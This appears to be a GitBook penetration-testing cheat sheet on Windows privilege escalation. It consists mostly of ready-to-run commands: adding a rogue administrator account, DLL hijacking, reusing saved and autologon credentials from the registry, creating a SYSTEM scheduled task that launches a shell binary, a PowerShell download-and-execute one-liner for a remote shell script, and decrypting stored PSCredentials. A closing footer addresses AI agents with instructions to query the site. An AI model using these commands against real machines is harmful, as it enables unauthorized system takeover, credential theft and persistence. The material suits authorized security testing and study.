# windows-privilege-escalation ## background shell ```bash START /B FILE Start-Process -NoNewWindow -FilePath FILE -ArgumentList "ARGS" [-Credential $creds] ``` ## Create User ```bash # add new user net user kashz iamR00t123! /add net localgroup administrators kashz /add net localgroup "Remote Management Users" kashz /add ``` ## DLL hijacking **NOTE:** needs RDP-access ```bash # required library files which could be missing; specified with relative paths; absolute paths which could be writable. > Run Procmon64.exe; filter to service in question; deselect registry activity and network activity > net start # see which DLL files are missing and exploit ``` ## RunAs | Creds reuse using PS ```bash # runAs > C:\Windows\System32\runas.exe /savecred /user:DOMAIN\USER "COMMAND" > C:\Windows\System32\runas.exe /env /noprofile /user:USER PASSWORD "COMMAND" # using PS PS> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName PS> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword # once we have the autologon pass # run shell using saved cred PS> $username = "kashz" PS> $password = ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force PS> $creds = New-Object System.Management.Automation.PSCredential($username, $password) # run shell as scheduled task PS> Invoke-Command -Computer HOSTNAME -ScriptBlock { schtasks /create /sc onstart /tn kshell /tr "C:\Users\Public\kashz.exe" /ru SYSTEM } -Credential $creds PS> Invoke-Command -Computer HOSTNAME -ScriptBlock { schtasks /run /tn kshell } -Credential $creds # run shell PS> Start-Process "C:\Users\Public\kashz.exe" -Credential $creds PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('/shell.ps1')" -Credential $creds ``` ## Decrypt PSCredential ```bash # need to be the user who encrypted the data PS> $UserCred = Import-Clixml -Path | ERROR: Error occurred during a cryptographic operation. => not the right user. PS> $UserCred.GetNetworkCredential().password PS> $user = "USER" PS> $pass = "ENCRYPTED-DATA" | convertto-securestring PS> $cred = New-Object System.Management.Automation.PSCredential($user, $pass) PS> $cred.GetNetworkCredential() | fl ``` ## Reference * [travisgan.com/powershell-password-encryption.html](https://www.travisgan.com/2015/06/powershell-password-encryption.html) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/kashz-jewels/os-windows/windows-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.